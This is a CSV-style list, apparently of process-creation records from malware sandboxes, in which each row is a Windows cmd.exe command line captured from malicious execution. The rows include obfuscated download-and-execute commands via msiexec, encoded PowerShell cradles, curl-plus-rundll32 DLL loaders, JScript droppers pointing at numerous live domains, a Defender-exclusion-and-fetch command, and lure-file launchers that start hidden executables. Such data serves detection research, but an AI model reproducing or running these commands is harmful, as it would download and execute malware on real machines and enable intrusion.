"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/x /d/CtyPe BilJ.DaT|CMD","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/v/r TYpE TUXL.Dat|cMD","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe""
/q/RTYpE ao.dAt|Cmd","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /R ^S^tART mS^i^E^xEc /Q/I""HTTP://Fz.Ms:8080/gYreenYlovk/HOST1?user""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c expand C:\Windows\system32\msiexec.exe C:\Users\user\AppData\Roaming\mel.exe & pca^lua.exe -a C:\Users\user\AppData\Roaming\mel -c /Q /i http://dps.shconstmarket.com/veafdsag.msi?devop=StAObTofsr","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" powershell.exe -Nop -sta -noni -w hidden -c ""-encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /C ""pow""""ershell -e SQ""""BFAFgAIAAoACgAbgB""""lAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMQA3AC4ANwAzAC4ANgA2AC8AcgBlAHYAIgApACkAOwA=""","C:\Users\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /C ""powers""""hell -e SQBFAF""""gAIAAoACgAbgB""""lAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMQA3AC4ANwAzAC4ANgA2AC8AcgBlAHYAIgApACkAOwA=""","C:\Users\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /C start powershell -windowStyle hidden -command ""& {Add-MpPreference -ExclusionPath ""C:""; iwr https://github.com/GeorgTim/t/raw/main/p.txt -OutFile C:\ProgramData\h.exe; start C:\ProgramData\h.exe}""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /C xcopy /HY a.cpl C:\Users\user\AppData\Local\Temp&&start C:\Users\user\AppData\Local\Temp\a.cpl&start /D C:\ /MAX explorer %CD%"".Spotlight-V100""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /C xcopy /HY a.cpl C:\Users\user\AppData\Local\Temp&&start C:\Users\user\AppData\Local\Temp\a.cpl&start /D C:\ /MAX explorer %CD%""CRC""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /D /RST^ARt ^M^s^i^eX^eC -^fV ""HTTp://M0.nU:8080/yauX5B/LB0gIPbS8evnPT1y/m/1De/1sqC5zxbhA4m/HOST1"" /^q","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /R^st^A^r^t ^Ms^i^exE^C /^qu^iet /^FV ""htTp://u0.NZ:8080/AYApB4Gpg9qvhB/xtdzovUVA4txh/HOST1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V /C set x4OAGWfxlES02z6NnUkK=2whttpr0&&set L1U03HmUO6B9IcurCNNlo4=.com && echo | start https://get.adobe.com/br/flashplayer/","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:jBFSW\&&s^eT TXHO=C:jBFSW\^u8jBFSW&&S^Et MVYL=v9NPar CRMX=""sc""+""^r"";DRMX=""i^p""+""t^:9NPh"";ERMX=""T""+""t^P""+"":"";G9NPet^Ob^j9NPec^t(CRMX+DRMX+ERMX+'&&s^ET YYR=VMNBVVMNBVtaaa0g.paraisofiscal.coVMNBV?1VMNBV');&&s^Et/^p YXFL=""!MVYL:9NP=!!YYR:VMNBV=/!""<n^ul > !TXHO!.^jS|ca^ll c^a^ll !TXHO!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:
PEQ8LB\&&s^eT TJUD=C:
PEQ8LB\^rPEQ8LB&&S^Et JLHD=vRZGar CnSP=""sc""+""^r"";DnSP=""i^p""+""t^:RZGh"";EnSP=""T""+""t^P""+"":"";GRZGet^Ob^jRZGec^t(CnSP+DnSP+EnSP+'&&s^ET 816=SVILJSVILJhvaiew.filhododono.coSVILJ?1SVILJ');&&s^Et/^p ZLKW=""!JLHD:RZG=!!816:SVILJ=/!""<n^ul > !TJUD!.^jS|ca^ll c^a^ll !TJUD!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\6PEMCS4\&&s^eT AAZO=C:\6PEMCS4\^6PEMCS4&&S^Et GXKT=vnjfar Ckqr=""sc""+""^r"";Dkqr=""i^p""+""t^:njfh"";Ekqr=""T""+""t^P""+"":"";Gnjfet^Ob^jnjfec^t(Ckqr+Dkqr+Ekqr+'&&s^ET 2DY=ZXXSSZXXSS20oums.sportsutility.autosZXXSS?1ZXXSS');&&s^Et/^p CTFA=""!GXKT:njf=!!2DY:ZXXSS=/!""<n^ul > !AAZO!.^jS|ca^ll c^a^ll !AAZO!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\AXXKSOU\&&s^eT VXBM=C:\AXXKSOU\^AXXKSOU&&S^Et KUID=vmvgar CqUu=""sc""+""^r"";DqUu=""i^p""+""t^:mvgh"";EqUu=""T""+""t^P""+"":"";Gmvget^Ob^jmvgec^t(CqUu+DqUu+EqUu+'&&s^ET XNY=NPVIRNPVIRudea7s.nitrofarmmoney.vipNPVIR?1NPVIR');&&s^Et/^p YBL1=""!KUID:mvg=!!XNY:NPVIR=/!""<n^ul > !VXBM!.^jS|ca^ll c^a^ll !VXBM!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\BT59TX5\&&s^eT YXVE=C:\BT59TX5\^BT59TX5&&S^Et DNRL=voX3ar C66d=""sc""+""^r"";D66d=""i^p""+""t^:oX3h"";E66d=""T""+""t^P""+"":"";GoX3et^Ob^joX3ec^t(C66d+D66d+E66d+'&&s^ET 0TN=DOYWVDOYWVn7eo5j.realidadeavancada.coDOYWV?1DOYWV');&&s^Et/^p K1J0=""!DNRL:oX3=!!0TN:DOYWV=/!""<n^ul > !YXVE!.^jS|ca^ll c^a^ll !YXVE!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\Gp3FI0D\&&s^eT ADCS=C:\Gp3FI0D\^Gp3FI0D&&S^Et QYPP=v3Pkar CGDN=""sc""+""^r"";DGDN=""i^p""+""t^:3Pkh"";EGDN=""T""+""t^P""+"":"";G3Pket^Ob^j3Pkec^t(CGDN+DGDN+EGDN+'&&s^ET DHY=LHFPBLHFPBhviaee.nameglass.topLHFPB?1LHFPB');&&s^Et/^p JIEO=""!QYPP:3Pk=!!DHY:LHFPB=/!""<n^ul > !ADCS!.^jS|ca^ll c^a^ll !ADCS!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\J9oIM9J\&&s^eT ZAXL=C:\J9oIM9J\^J9oIM9J&&S^Et NGEH=vAfAar CXev=""sc""+""^r"";DXev=""i^p""+""t^:AfAh"";EXev=""T""+""t^P""+"":"";GAfAet^Ob^jAfAec^t(CXev+DXev+EXev+'&&s^ET RR0=WUYSFWUYSFahaaer.pfktaacgojiozfehwkkimhkbkm.cfdWUYSF?1WUYSF');&&s^Et/^p 5A4S=""!NGEH:AfA=!!RR0:WUYSF=/!""<n^ul > !ZAXL!.^jS|ca^ll c^a^ll !ZAXL!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\YsC37WJ\&&s^eT JGCQ=C:\YsC37WJ\^YsC37WJ&&S^Et JJQE=v01rar CdlK=""sc""+""^r"";DdlK=""i^p""+""t^:01rh"";EdlK=""T""+""t^P""+"":"";G01ret^Ob^j01rec^t(CdlK+DdlK+EdlK+'&&s^ET O7I=CNEIQCNEIQ7raa64.eosatreladosainflacao.za.comCNEIQ?1CNEIQ');&&s^Et/^p 55D0=""!JJQE:01r=!!O7I:CNEIQ=/!""<n^ul > !JGCQ!.^jS|ca^ll c^a^ll !JGCQ!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\Z7eL9P5\&&s^eT LPTM=C:\Z7eL9P5\^Z7eL9P5&&S^Et YGBP=vFUsar C78b=""sc""+""^r"";D78b=""i^p""+""t^:FUsh"";E78b=""T""+""t^P""+"":"";GFUset^Ob^jFUsec^t(C78b+D78b+E78b+'&&s^ET W8C=NQMRMNQMRMr8eekv.convertiblecm.autosNQMRM?1NQMRM');&&s^Et/^p Y5ZL=""!YGBP:FUs=!!W8C:NQMRM=/!""<n^ul > !LPTM!.^jS|ca^ll c^a^ll !LPTM!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\ZtJB6T9\&&s^eT RFNR=C:\ZtJB6T9\^ZtJB6T9&&S^Et EOZD=vi04ar CQKR=""sc""+""^r"";DQKR=""i^p""+""t^:i04h"";EQKR=""T""+""t^P""+"":"";Gi04et^Ob^ji04ec^t(CQKR+DQKR+EQKR+'&&s^ET EOD=QYDRKQYDRKymiudk.averdadedascoisas.coQYDRK?1QYDRK');&&s^Et/^p 164T=""!EOZD:i04=!!EOD:QYDRK=/!""<n^ul > !RFNR!.^jS|ca^ll c^a^ll !RFNR!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\hn037US\&&s^eT HAXO=C:\hn037US\^hn037US&&S^Et WWAD=vvzDar CSg7=""sc""+""^r"";DSg7=""i^p""+""t^:vzDh"";ESg7=""T""+""t^P""+"":"";GvzDet^Ob^jvzDec^t(CSg7+DSg7+ESg7+'&&s^ET RKS=RKJTBRKJTBwat3.filhododono.coRKJTB?1RKJTB');&&s^Et/^p 7S01=""!WWAD:vzD=!!RKS:RKJTB=/!""<n^ul > !HAXO!.^jS|ca^ll c^a^ll !HAXO!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\kO4L81H\&&s^eT GBCF=C:\kO4L81H\^kO4L81H&&S^Et LVEJ=vinBar CIVl=""sc""+""^r"";DIVl=""i^p""+""t^:inBh"";EIVl=""T""+""t^P""+"":"";GinBet^Ob^jinBec^t(CIVl+DIVl+EIVl+'&&s^ET 4J3=IEJGMIEJGMkwat3.representantesaliciaemarcia.buzzIEJGM?1IEJGM');&&s^Et/^p 39LQ=""!LVEJ:inB=!!4J3:IEJGM=/!""<n^ul > !GBCF!.^jS|ca^ll c^a^ll !GBCF!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\lyuG5P8\&&s^eT VWPY=C:\lyuG5P8\^lyuG5P8&&S^Et HTIO=vSSTar CbRG=""sc""+""^r"";DbRG=""i^p""+""t^:SSTh"";EbRG=""T""+""t^P""+"":"";GSSTet^Ob^jSSTec^t(CbRG+DbRG+EbRG+'&&s^ET 196=KCXHYKCXHYeraa50.deanos.shopKCXHY?1KCXHY');&&s^Et/^p IHD6=""!HTIO:SST=!!196:KCXHY=/!""<n^ul > !VWPY!.^jS|ca^ll c^a^ll !VWPY!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\m9b0HSS\&&s^eT QJRD=C:\m9b0HSS\^m9b0HSS&&S^Et VBUN=vHu4ar CeOW=""sc""+""^r"";DeOW=""i^p""+""t^:Hu4h"";EeOW=""T""+""t^P""+"":"";GHu4et^Ob^jHu4ec^t(CeOW+DeOW+EeOW+'&&s^ET X4F=FSWIDFSWIDhdiaew.dizmidia.usFSWID?1FSWID');&&s^Et/^p 80O0=""!VBUN:Hu4=!!X4F:FSWID=/!""<n^ul > !QJRD!.^jS|ca^ll s^t^a^rt !QJRD!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\minKVM4\&&s^eT WBIX=C:\minKVM4\^minKVM4&&S^Et TNHL=vCLGar C5eo=""sc""+""^r"";D5eo=""i^p""+""t^:CLGh"";E5eo=""T""+""t^P""+"":"";GCLGet^Ob^jCLGec^t(C5eo+D5eo+E5eo+'&&s^ET GX6=SDCWOSDCWOfjuu8a.etariaentre.shopSDCWO?1SDCWO');&&s^Et/^p T9LT=""!TNHL:CLG=!!GX6:SDCWO=/!""<n^ul > !WBIX!.^jS|ca^ll c^a^ll !WBIX!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\sIEU4W0\&&s^eT GSVI=C:\sIEU4W0\^sIEU4W0&&S^Et GMQX=vGgwar Cqru=""sc""+""^r"";Dqru=""i^p""+""t^:Ggwh"";Eqru=""T""+""t^P""+"":"";GGgwet^Ob^jGgwec^t(Cqru+Dqru+Eqru+'&&s^ET ZID=UEMMYUEMMYhviier.averdadedascoisas.coUEMMY?1UEMMY');&&s^Et/^p C3FF=""!GMQX:Ggw=!!ZID:UEMMY=/!""<n^ul > !GSVI!.^jS|ca^ll c^a^ll !GSVI!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""md C:\yGGCOPE\&&s^eT BDIZ=C:\yGGCOPE\^yGGCOPE&&S^Et IVRF=vGTsar COny=""sc""+""^r"";DOny=""i^p""+""t^:GTsh"";EOny=""T""+""t^P""+"":"";GGTset^Ob^jGTsec^t(COny+DOny+EOny+'&&s^ET J4M=UXQYVUXQYVrhaiy9.alternaindenterx.cloudUXQYV?1UXQYV');&&s^Et/^p LHN0=""!IVRF:GTs=!!J4M:UXQYV=/!""<n^ul > !BDIZ!.^jS|ca^ll c^a^ll !BDIZ!.jS"" ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""s^eT CJNT=C:\Users\Public\V^id^eos\^SbRHYZ7&&S^Et MPOW=vxX4ar COjA=""sc""+""^r"";DOjA=""i^p""+""t^:xX4h"";EOjA=""T""+""t^P""+"":"";GxX4et^Ob^jxX4ec^t(COjA+DOjA+EOjA+'&&s^ET 7YA=PLWDLPLWDLi1iomc.vacaatolada.topPLWDL?1PLWDL');&&s^Et/^p 024D=""!MPOW:xX4=!!7YA:PLWDL=/!""<n^ul > !CJNT!.^j^S|ca^l^l s^t^a^rt !CJNT!.j^S ""|c^M^d ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""s^eT HALU=C:\Users\Public\V^id^eos\^N1jGH1Q&&S^Et RAUH=vGYTar C81g=""sc""+""^r"";D81g=""i^p""+""t^:GYTh"";E81g=""T""+""t^P""+"":"";GGYTet^Ob^jGYTec^t(C81g+D81g+E81g+'&&s^ET GW8=SZHPZSZHPZrveiw2.rashflaines.usSZHPZ?2SZHPZ');&&s^Et/^p K6WL=""!RAUH:GYT=!!GW8:SZHPZ=/!""<n^ul > !HALU!.^j^S|ca^l^l s^t^a^rt !HALU!.j^S ""|c^M^d ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""s^eT PGHI=C:\Users\Public\V^id^eos\^iLIP8YJ&&S^Et RLPG=vFQiar CtdU=""sc""+""^r"";DtdU=""i^p""+""t^:FQih"";EtdU=""T""+""t^P""+"":"";GFQiet^Ob^jFQiec^t(CtdU+DtdU+EtdU+'&&s^ET FGN=MVYICMVYICbmii6j.zecagavava.topMVYIC?1MVYIC');&&s^Et/^p P8LD=""!RLPG:FQi=!!FGN:MVYIC=/!""<n^ul > !PGHI!.^j^S|ca^l^l s^t^a^rt !PGHI!.j^S ""|c^M^d ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""se^T BJEB=^еж^зи^й╗&&s^eT BEVA=C:\Users\Public\V^id^eos\^zruOAWH&&S^Et FJEX=tr^y^{^vYjrar c='sc^ri^pt^:';d='hYjrTt^P:';GYjret^Ob^jYjrec^t(c+d+'&&s^ET U6I=PXVDEPXVDEueaejf.anintenddoom.questPXVDE?1PXVDE');}c^a^tch^(e^){^}^;&&s^Et/^p RB76=""!FJEX:Yjr=!!U6I:PXVDE=/!""<n^ul > !BEVA!.^j^S|ca^l^l s^t^a^rt !BEVA!.j^S ""|c^M^d ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/D/c ""se^T FGWX=^еж^зи^й╗&&s^eT PVVO=C:\Users\Public\V^id^eos\^eZ3V5Q4&&S^Et ZXZQ=tr^y^{^vEJcar c='sc^ri^pt^:';d='hEJcTt^P:';GEJcet^Ob^jEJcec^t(c+d+'&&s^ET S0J=XMNKMXMNKM4iuaxk.galotopgeeks.euXMNKM?1XMNKM');}c^a^tch^(e^){^}^;&&s^Et/^p RSXW=""!ZXZQ:EJc=!!S0J:XMNKM=/!""<n^ul > !PVVO!.^j^S|ca^l^l s^t^a^rt !PVVO!.j^S ""|c^M^d ","C:\wINdOws\sYSteM32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/RS^T^ArT ^M^S^ieXe^c /pA^C^KA^G^E ""HTtp://4N.wF:8080/Bj/A2Da9/6p/YRpwcHMbS3zNM4tW4wHSd/g4/!COMpUtERNAme!"" -^q^N ^rB=^E^PFcMT^c","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /V/r !CoMSPEC!<W.LNk:wjh","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""@echo open costco.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v""","C:\Users\user\AppData\Roaming\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""C:\Windows\System32\finger.exe nc3@40.122.191.218|more +2|cmd""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%2022领跑中考_河南地理(人教版)课件.zip & attrib -s -h %cd%ECpPiiK.exe & xcopy /F /S /Q /H /R /Y %cd%ECpPiiK.exe C:\Users\user\AppData\Local\Temp\UzNeH\ & attrib +s +h %cd%ECpPiiK.exe & start C:\Users\user\AppData\Local\Temp\UzNeH\ECpPiiK.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%System_Volume_Information & start %cd%JinSGtwoJsaWRGy.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%~$第10章.pptx & attrib -s -h %cd%ECpPiiK.exe & xcopy /F /S /Q /H /R /Y %cd%ECpPiiK.exe C:\Users\user\AppData\Local\Temp\UzNeH\ & attrib +s +h %cd%ECpPiiK.exe & start C:\Users\user\AppData\Local\Temp\UzNeH\ECpPiiK.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%~$第17课+外交事业的发展+课件(21张).pptx & attrib -s -h %cd%ECpPiiK.exe & xcopy /F /S /Q /H /R /Y %cd%ECpPiiK.exe C:\Users\user\AppData\Local\Temp\UzNeH\ & attrib +s +h %cd%ECpPiiK.exe & start C:\Users\user\AppData\Local\Temp\UzNeH\ECpPiiK.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""C:\Windows\explorer.exe %cd%哈哈哈哈哈哈哈哈.docx & attrib -s -h %cd%ECpPiiK.exe & xcopy /F /S /Q /H /R /Y %cd%ECpPiiK.exe C:\Users\user\AppData\Local\Temp\UzNeH\ & attrib +s +h %cd%ECpPiiK.exe & start C:\Users\user\AppData\Local\Temp\UzNeH\ECpPiiK.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""`\```\```\`\```\```\svhost.bpu||(forfiles /P C:\Users\user\AppData\Roaming\..\..\ /S /^M^ ""State of play in EU trade policy.zip"" /C ""cmd /c (c:\progra~1\winrar\winrar x -id -o+ @path||c:\progra~2\winrar\winrar x -id -o+ @path||c:\progra~1\7-Zip\7z x -y -aoa @path||c:\progra~2\7-Zip\7z x -y -aoa @path)&&`\```\```\`\```\```\svhost.bpu"")""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""curl http://121.5.28.63/cmd.txt > C:\Users\user\AppData\Roaming\\cmd.vbs && C:\Users\user\AppData\Roaming\\cmd.vbs""","C:\Windows\System32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""curl http://124.220.178.26/cmd.txt > C:\Users\user\AppData\Local\Temp\\cmd.vbs && C:\Users\user\AppData\Local\Temp\\cmd.vbs""","C:\Windows\System32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""powershell.exe -noprofile -executionpolicy bypass -command [System.Reflection.Assembly]:'daoL'((New-Object System.Net.WebClient).'ataDdaolnwoD'('')).EntryPoint.Invoke($null, $null)""","C:\WINDOWS\system32\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start %cd%RECYCLER\DSCI5829.jpg -us&&C:\Windows\explorer.exe %cd%Job#79-R.383 SABINE FURRH MIMS 2 H""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start 12v3q3Ee.png && start rundll32 mfQjc9Cy.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start 1cMX04lL.png && start rundll32 jtDVqCyQ.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start 2YFRUxV1.png && c^u^rl """"http://138.124.183.52/zazaz/poJvYMKG2T4IG3FTaI3C61d9kqrjaTG4jQ~~/Y9KL4c43P_KjnBiEEcDDqtfX-bmhiyLj8g~~/"""" -o C:\Users\user\AppData\Local\Temp\9jXqQZQh.dll && start r^un^dl^l3^2 C:\Users\user\AppData\Local\Temp\9jXqQZQh.d^l^l, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start 56odPwA1.png && c^u^rl """"http://138.124.183.30/gigig/X1uiciBR9agpsGaBmNPOg0i1HXFVVli4ag~~/Da599o2XIVE8n58Wxcg-Dl8ZcvCwZ2pXoQ~~/"""" -o C:\Users\user\AppData\Local\Temp\hwSoT3Wq.dll && start r^un^dl^l3^2 C:\Users\user\AppData\Local\Temp\hwSoT3Wq.d^l^l, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start 7L7NJEQU.png && start rundll32 2oRINxYD.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start 8258WeqD.png && start rundll32 VNXdz2Gs.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start BOCT7Gsf.png && start rundll32 m0Z6kYy3.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start Gc6S9M3u.png && start rundll32 q4Ya8I9o.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start OM0Wby5o.png && c^u^rl """"http://138.124.183.30/gigig/fAUIJ-FwV9xaL7ftzslcXYxrSUpvPbKjLg~~/P-4u5s3oyQ4gHEN9h6h_TNYetMtwMqUvVg~~/"""" -o C:\Users\user\AppData\Local\Temp\T5SLu2OZ.dll && start r^un^dl^l3^2 C:\Users\user\AppData\Local\Temp\T5SLu2OZ.d^l^l, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start Sm4dVpwx.png && start rundll32 mVi4x9m3.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start dhBaiEM6.png && start rundll32 rixD9oLa.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start iCsCz6HJ.png && c^u^rl """"http://138.124.183.50/barkss/vD_Tw-GOnBjO17U2KFAecyl-QwFQKg6_1w~~/gwMSJ4sJbgBM1qTc5FrYDAiczZDtXni35w~~/"""" -o C:\Users\user\AppData\Local\Temp\VLaxMu2v.dll && start r^un^dl^l3^2 C:\Users\user\AppData\Local\Temp\VLaxMu2v.d^l^l, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start owl7Xucq.png && start rundll32 aQO8g9KS.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start qEZIRw3N.png && c^u^rl """"http://138.124.183.52/zazaz/nbUfJQdoZWN7enJiZ1zxstLPVuHvF4-8pg~~/T_JOrZ4m6Dlbm-jK57P071TbYMNmdwb99Q~~/"""" -o C:\Users\user\AppData\Local\Temp\NT1w0me3.dll && start r^un^dl^l3^2 C:\Users\user\AppData\Local\Temp\NT1w0me3.d^l^l, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start sgJKXBFK.png && start rundll32 x3PF2bet.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""start sxNWciS3.png && start rundll32 CCVg6rDq.dll, #1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c ""{65e63f8d-bc2b-35a6-bd37-6ee1161ae83f}\52d16e20-aa43-ea61-9822-cf87439e6b2a.exe 'опп список группы.docx'""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c %LOCALAPPDATA:~-3,-2%%TMP:~-3,1%%CommonProgramW6432:~4,-24%%TMP:~-4,1%uti%CommonProgramFiles:~-3,-2%.ex%LOCALAPPDATA:~5,1% -%TEMP:~3,1%%APPDATA:~-7,-6%%CommonProgramFiles:~13,-15%ca%LOCALAPPDATA:~-3,-2%he -%TMP:~7,1%%CommonProgr","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c @""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoProfile -win 1 -InputFormat None -ExecutionPolicy Bypass -Command ""iEx((New-Object Net.WebClient).""DoWnlOAdstRiNG""(""""""http://192.168.0.2/teste.txt""""""))""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\Windows\System32\cmd.exe"" /c @echo off && title Update && bitsadmin /transfer mdj /download /priority FOREGROUND https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe ""C:\Users\user\AppData\Local\Temp\\putty.exe"" && start """" ""C:\Users\user\AppData\Local\Temp\\putty.exe""","C:\Users\user\Desktop\",1
